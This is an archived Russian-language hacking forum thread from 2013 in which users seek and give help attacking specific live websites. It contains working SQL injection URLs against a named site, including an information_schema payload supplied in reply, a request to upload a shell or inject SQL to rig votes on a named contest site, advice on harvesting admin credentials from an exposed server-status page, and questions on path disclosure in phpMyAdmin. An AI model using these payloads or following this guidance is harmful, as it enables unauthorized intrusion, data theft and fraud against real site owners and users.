ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.06.2013, 20:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
1793
Репутация:
-5
|
|
Всем привет!
Кто подскажет,есть сайт ......../wechselbude/index.php?page=content&name=info
Если сделать так ......../wechselbude/index.php?page=content&name=(SELECT%20CONCAT(versi on(),user(),database()))
то выводит version 5.1.66-nmm3-log
user d01333ce@localhost
db d01333ce
но дальше вообще никак ни через union ни через and,
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /www/htdocs/w00db281/wechselbude/content/content.php on line 6
|
|
|
|
30.06.2013, 21:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
1793
Репутация:
-5
|
|
Я с этими инклудами вообще не дружу
|
|
|
|
30.06.2013, 21:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
wkuzy,
Сообщение от None
http://hammjue.at/wechselbude/index.php?page=content&name=((select table_name from information_schema.tables limit 1,1))
|
|
|
|
30.06.2013, 22:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
1793
Репутация:
-5
|
|
Сообщение от trololoman96
trololoman96 said:
wkuzy,
Спасибо ,дальше я сам
|
|
|
|
01.07.2013, 18:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
726
Репутация:
0
|
|
пытаюсь девочке помочь с хреновым контестом.
уверен что саит написан по левому.
кто поможет закачать шелл, или пробить SQL иньекцыю чтоб увеличить девочке колво votes?
саит; http://whowearsitbetter.com/2july.php
помогаю подруге и учусь уму разуму, помошь отблагадорю через paypal.
|
|
|
|
01.07.2013, 18:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
726
Репутация:
0
|
|
ты когда в послендии раз первыи пост етои темы читал?
|
|
|
|
01.07.2013, 23:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
29020
Репутация:
55
|
|
Сообщение от HAXTA4OK
HAXTA4OK said:
может быть все таки замена по регулярке идет
Я нашел проблему. В файле самого вп. В wp-includes/load.php есть такое:
Код:
Code:
// Escape with wpdb.
$_GET = add_magic_quotes( $_GET );
$_POST = add_magic_quotes( $_POST );
$_COOKIE = add_magic_quotes( $_COOKIE );
$_SERVER = add_magic_quotes( $_SERVER );
// Force REQUEST to be GET + POST.
$_REQUEST = array_merge( $_GET, $_POST );
и сам код функции add_magic_quotes
Код:
Code:
function add_magic_quotes( $array ) {
foreach ( (array) $array as $k => $v ) {
if ( is_array( $v ) ) {
$array[$k] = add_magic_quotes( $v );
} else {
$array[$k] = addslashes( $v );
}
}
return $array;
}
Эта фигня портит всю малину. Я так понимаю что тут уже ничего не сделать ?
|
|
|
|
03.07.2013, 09:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?
|
|
|
|
03.07.2013, 12:07
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от Br@!ns
Br@!ns said:
Есть сайт с открытым /server-status, хочу попытаться выловить авторизацию админа, как это лучше сделать? мб можно как нибудь постоянно парсить все результаты выводимые, и через 1-2 дня к примеру проверить этот список?
Ты только адрес админ-панели максимум выловишь.
Не, ну если авторизация идёт через GET - То да, поймаешь аутентификационные данные.
А так, максимум - адрес админ панели.
|
|
|
03.07.2013, 20:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
8952
Репутация:
0
|
|
есть Phpmyadmin: 3.3.7deb7
можно ли на нем раскрыть пути? есть права рута
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
